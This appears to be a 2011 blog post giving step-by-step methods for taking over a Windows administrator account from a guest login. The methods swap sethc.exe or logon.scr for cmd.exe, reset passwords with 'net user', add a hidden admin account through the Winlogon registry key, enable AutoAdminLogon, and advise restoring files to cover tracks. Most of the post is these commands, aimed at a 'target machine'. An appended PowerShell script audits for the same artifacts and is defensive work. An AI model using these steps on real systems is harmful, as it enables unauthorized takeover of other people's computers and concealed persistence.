Tuesday 22 March 2011

Hack administrators password through guest login

Method 1 (Change Admin Password)

1. Go to C:\windows\system32
2. Copy cmd.exe and paste it on the desktop.
3. Rename cmd.exe to sethc.exe
4. Copy the new sethc.exe to system32. When Windows asks whether to overwrite the file, click Yes.
5. Now log out from your guest account and, at the user select window, press the Shift key 5 times.
6. Instead of the Sticky Keys confirmation dialog, a command prompt with full administrator privileges will open.
7. Now type "NET USER ADMINISTRATOR aaa", where "aaa" can be any password you like, and press Enter.
8. You will see "The command completed successfully". Then exit the command prompt and log in to administrator with your new password.

Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing "NET USER How to hack /ADD", where "How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account as follows.
Go to the registry editor and navigate to this key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Here create a new "DWORD value" and name it "How to hack" (the username that you entered in the previous step). Now you can live with your admin account forever.

Method 3:

Log into a limited account on your target machine, open up a DOS prompt,
then enter this set of commands exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
What you have just done is back up the command program and the screen saver
file, then put cmd.exe in place of the logon screen saver, so that when the
machine starts the screen saver you get an unprotected DOS prompt without logging into XP.
Once this happens, enter this command, minus the quotes:
"net user password"
If the Administrator account is called Frank and you want the password blah, enter this:
"net user Frank blah"
This changes the password on Frank's machine to blah and you're in.

P.S.: don't forget to copy the contents of temphack back into the system32 dir to cover tracks.

Automatic Administrator Login

Here's a trick you can use to show that Windows XP is not at all secure as a multi-user operating system. Hacking the system registry from any account that has access to it puts you into the administrator account.
REGEDIT:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
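
Each method above leaves an artifact on disk or in the registry that an administrator can check for. The following PowerShell audit is an added example, not part of the original post; it assumes PowerShell 4.0 or later (for Get-FileHash) and an elevated prompt, and the variable names and finding messages are illustrative.

```powershell
# Added example: audit a host for the artifacts left by the methods on this page.
$sys32    = Join-Path $env:SystemRoot 'System32'
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$findings = @()

# Methods 1 and 3: sethc.exe or logon.scr replaced with a copy of cmd.exe.
$cmdPath = Join-Path $sys32 'cmd.exe'
if (Test-Path $cmdPath) {
    $cmdHash = (Get-FileHash -Path $cmdPath -Algorithm SHA256).Hash
    foreach ($name in 'sethc.exe', 'logon.scr') {
        $path = Join-Path $sys32 $name
        # logon.scr does not exist on newer Windows versions, so a missing file is skipped.
        if ((Test-Path $path) -and
            ((Get-FileHash -Path $path -Algorithm SHA256).Hash -eq $cmdHash)) {
            $findings += "$name is byte-identical to cmd.exe"
        }
    }
} else {
    # Method 3 renames cmd.exe away, so its absence is itself worth reporting.
    $findings += "cmd.exe is missing from $sys32"
}

# Method 3: leftover backup folder named on this page.
if (Test-Path (Join-Path $sys32 'temphack')) {
    $findings += "Folder 'temphack' exists under $sys32"
}

# Method 2: accounts hidden from the logon screen. A DWORD with data 0
# under SpecialAccounts\UserList hides the account named by the value.
$userList = Join-Path $winlogon 'SpecialAccounts\UserList'
if (Test-Path $userList) {
    $key = Get-Item -Path $userList
    foreach ($valueName in $key.GetValueNames()) {
        if ($key.GetValue($valueName) -eq 0) {
            $findings += "Account '$valueName' is hidden from the logon screen"
        }
    }
}

# Automatic logon enabled in Winlogon.
$auto = (Get-ItemProperty -Path $winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue).AutoAdminLogon
if ($auto -eq '1') { $findings += 'AutoAdminLogon is set to 1' }

if ($findings.Count -gt 0) {
    $findings | ForEach-Object { Write-Warning $_ }
} else {
    Write-Output 'None of the artifacts described on this page were found.'
}
```

A clean result only means these specific artifacts are absent; a hash match on sethc.exe should be followed by restoring the file from trusted media and reviewing local accounts.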
